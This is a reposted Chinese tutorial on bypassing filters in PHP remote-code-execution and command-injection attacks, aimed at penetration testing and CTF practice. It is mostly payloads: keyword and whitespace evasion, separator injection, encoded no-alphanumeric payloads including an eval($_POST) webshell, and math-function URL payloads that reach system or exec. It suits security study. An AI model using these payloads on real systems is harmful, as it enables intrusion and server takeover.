分享 | RCE常见的Bypass思路

admin 2022年5月12日00:57:41安全文章评论8 views4751字阅读15分50秒阅读模式

作者L3ife1  

原文地址:https://www.freebuf.com/articles/web/330736.html


在渗透或者CTF中,总会有特殊函数被过滤,如'ls、cat、tac'。

防火墙将这些函数加入黑名单,我们需要找一些方法来代替,用fuzz给他们替换,就出现了BYpass思路。


这里总结了RCE常见的Bypass思路

学习就是先走一回别人的老路,知识点到量才可以开创自己的新路。


一、RCE漏洞


远程代码执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。


原理:服务器没有对执行命令的函数进行过滤,导致命令被执行。


二、常见的命令执行函数

PHP代码执行函数

eval()
assert()
preg_replace()
create_function()
call_user_func()
file_get_contents():将整个文件读入一个字符串
readfile():读取文件并写入到输出缓冲
scandir():列出指定路径中的文件和目录
direname():给出一个包含有指向一个文件的全路径的字符串,本函数返回去掉文件名后的目录名
getcwd():取得当前工作目录
chdir($directory):将 PHP 的当前目录改为 directory
get_defined_vars():获取一个环境变量的值
phpversion():获取当前的PHP版本
chr():返回指定的字符
rand():产生一个随机整数
time():返回当前的 Unix 时间戳
localtime():取得本地时间
localtime(time()) 返回一个数组,Array [0] 为一个 0~60 之间的数字
hex2bin():转换十六进制字符串为二进制字符串
ceil():进一法取整
sinh():双曲正弦
cosh():双曲余弦
tan():正切
floor():舍去法取整
sqrt():平方根
crypt():单向字符串散列hebrevc:将逻辑顺序希伯来文(logical-Hebrew)转换为视觉顺序希伯来文(visual-Hebrew),并且转换换行符
ord:返回字符串的第一个字符的 ASCII 码

命令执行函数

eval()、system()、shell_exec()、popen()、proc_popen()、passthru()、pcntl_exec()


三、绕过方式

过滤关键字,如cat、more

1.替换法
使用同意思字符串代替

more:一页一页的显示档案内容
less:与 more 类似
head:查看头几行
tac:从最后一行开始显示,可以看出 tac 是 cat 的反向显示
tail:查看尾几行
nl:显示的时候,顺便输出行号
sort:可以查看

2.进行转义

cat flag ->cat flag
cat flag -> ca"t flag
cat flag -> ca't flag

3.进行拼接

a=fl;b=ag;cat$IFS$a$b

4.空变量$*和[email protected],$x,${x}绕过

分享 | RCE常见的Bypass思路


5.反引号绕过

`command`

6.Base64编码绕过

分享 | RCE常见的Bypass思路


7.RE绕过

分享 | RCE常见的Bypass思路

过滤命令执行函数,如system

1.借助其他的函数

echo
system()
passthru()
exec()
shell_exec()
popen()
proc_open()
pcntl_exec()
highlight_file()
反引号 同shell_exec()

2.URL编码绕过

base64
hex
oct

分享 | RCE常见的Bypass思路

3.内敛绕过

echo `ls`;
echo $(ls);
?><?=`ls`;
?><?=$(ls);

过滤文件读取

绕过

curl file:///flag
strings flag
uniq -c flag
bash -v flag
rev flag

过滤空格

<> (cat<>flag)
%20(space)
%09(tab) (cat%09flag.php)
$IFS$9
${IFS}
$IFS
(cat,flag)

过滤目录分隔符

1.多管道命令绕过
127.0.0.1||cat%20flag.php

过滤分隔符

; //分号
| //执行右边命令
|| //执行前面命令
& //都执行

IP进制绕过

ip地址过滤可将IP地址转化为数字IP地址

IP地址用“点分十进制”表示,用“.”分成4部分;数字地址是一串用“十进制”表示的数字
比如:百度的IP地址“39.156.69.79”转换成数字地址就是“664552783”。在浏览器中输入664552783就可以访问百度网站
转化网址:http://www.msxindl.com/tools/ip/ip_num.asp


四、一些骚操作

RCE进行无数字字母绕过

分享 | RCE常见的Bypass思路

echo urlencode(~'phpinfo').'<br />'; //得到%8F%97%8F%96%91%99%90
echo urlencode(~'assert').'<br />'; //得到%9E%8C%8C%9A%8D%8B
//assert();
echo urlencode(~'(eval($_POST[cmd]))'); //得到%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9C%92%9B%A2%D6%D6
?>

?code=(~%8F%97%8F%96%91%99%90)(); //列出phpinfo
?code=(~%9E%8C%8C%9A%8D%8B)(~%D7%9A%89%9E%93%D7%DB%A0%AF%B0%AC%AB%A4%9C%92%9B%A2%D6%D6); //上传一句话马

disable_function绕过总结

常规绕过:exec,shell_exec,system,passthru,popen,proc_open
利用环境变量LD_PRELOAD绕过(★):mail,imap_mail,error_log,mb_send_mail
利用pcntl_exec绕过利用imap_open函数任意命令执行(CVE-2018-19518)
利用系统组件window com绕过利用Apache+mod_cgi+.htaccess绕过
利用ImageMagick漏洞绕过利用PHP7.4的FFI绕过
利用 ShellShock绕过(CVE-2014-6271)
蚁剑插件

'数学'RCE

1.利用数学函数来运算得到函数名和命令,使用动态函数来执行命令

index.php?c=base_convert('37907361743',10,36)dechex('1598506324');($$pi){pi}(($$pi){abs})&pi=system&abs=<command>

hex2bin(_GET) -> base_convert('37907361743',10,36)dechex('1598506324'); dechex("1598506324")->5f474554
($$pi){pi}(($$pi){abs})&pi=system&abs=<command> -> ($_GET){pi}($_GET){abs} //{}可以代替[]

2.拼凑出getallheaders利用HeaderRCE
getallheaders — 获取全部 HTTP 请求头信息

/index.php?c=$pi=base_convert,$pi(696468,10,36)($pi(8768397090111664438,10,30)(){1})

在HTTP请求的Header中直接添加命令即可

base_convert(696468,10,36) => "exec"
$pi(8768397090111664438,10,30) => "getallheaders"
exec(getallheaders(){1})
//操作xx和yy,中间用逗号隔开,echo都能输出
echo xx,yy

3.拼凑出exec、system等命令执行函数直接RCE

/index.php?c=($pi=base_convert)(22950,23,34)($pi(76478043844,9,34)(dechex(109270211257898)))
//分析:exec('hex2bin(dechex(109270211257898))') => exec('cat f*')

/index.php?c=base_convert(1751504350,10,36)(base_convert(15941,10,36).(dechex(16)^asinh^pi))
//分析:system('cat'.dechex(16)^asinh^pi) => system('cat *')

4.异或

<?php
$payload = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh', 'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
for($k=1;$k<=sizeof($payload);$k++){
for($i = 0;$i < 9; $i++){
for($j = 0;$j <=9;$j++){
$exp = $payload[$k] ^ $i.$j;
echo($payload[$k]."^$i$j"."==>$exp");
echo "<br />";
}
}
}

分享 | RCE常见的Bypass思路

/index.php?c=$pi=(is_nan^(6).(4)).(rand^(7).(5));$pi=$$pi;$pi{0}($pi{1})&0=system&1=cat /f*

参考

https://cloud.tencent.com/developer/article/1599149
https://xz.aliyun.com/t/8354
https://blog.csdn.net/xiaofengdada/article/details/122614693


声明:本公众号所分享内容仅用于网安爱好者之间的技术讨论,禁止用于违法途径,所有渗透都需获取授权!否则需自行承担,本公众号及原作者不承担相应的后果.

文章来源:白帽子左一

>精彩回顾<

干货 | 红队快速批量打点的利器

【干货】最全的Tomcat漏洞复现

{Vulhub漏洞复现(一)ActiveMQ}

{Vulhub漏洞复现(二) Apereo CAS}

Cobalt Strike免杀脚本生成器|cna脚本|bypassAV

xss bypass备忘单|xss绕过防火墙技巧|xss绕过WAF的方法

【贼详细 | 附PoC工具】Apache HTTPd最新RCE漏洞复现

干货 | 横向移动与域控权限维持方法总汇

干货 | 免杀ShellCode加载框架

【干货】phpMyAdmin漏洞利用汇总

【神兵利器 | 附下载】一个用于隐藏C2的、开箱即用的Tools

分享 | 个人渗透技巧汇总(避坑)笔记

分享 | RCE常见的Bypass思路

关注我

获得更多精彩

分享 | RCE常见的Bypass思路


坚持学习与分享!走过路过点个"在看",不会错过分享 | RCE常见的Bypass思路

仅用于学习交流,不得用于非法用途

如侵权请私聊公众号删文

觉得文章不错给点个‘再看’吧



原文始发于微信公众号(EchoSec):分享 | RCE常见的Bypass思路

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月12日00:57:41
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  分享 | RCE常见的Bypass思路 http://cn-sec.com/archives/999279.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: